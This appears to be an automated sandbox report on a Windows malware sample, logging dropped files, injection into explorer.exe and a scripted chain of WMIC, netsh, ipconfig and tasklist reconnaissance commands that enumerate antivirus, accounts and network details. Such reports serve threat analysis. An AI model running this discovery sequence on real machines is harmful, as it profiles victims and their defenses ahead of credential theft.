Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,

9_2_00007FF780B67138

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\hehcrfb

Jump to behavior

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\4470.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: OCYe9qcxiM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="624"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="744"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="868"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner

Source: C:\Windows\explorer.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 354F.exe, 00000009.00000002.3874615260.000001B605CAC000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543198734.000001B605D13000.00000004.00000020.00020000.00000000.sdmp, 354F.exe, 00000009.00000003.2543460011.000001B605D1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT * FROM Win32_Productp#=:;
Source: ECAA.tmp.11.dr, EF9B.tmp.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: OCYe9qcxiM.exe

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Users\user\Desktop\OCYe9qcxiM.exe "C:\Users\user\Desktop\OCYe9qcxiM.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: unknown	Process created: C:\Users\user\AppData\Roaming\hehcrfb C:\Users\user\AppData\Roaming\hehcrfb
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fihcrfb C:\Users\user\AppData\Roaming\fihcrfb
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4470.exe C:\Users\user\AppData\Local\Temp\4470.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\354F.exe C:\Users\user\AppData\Local\Temp\354F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
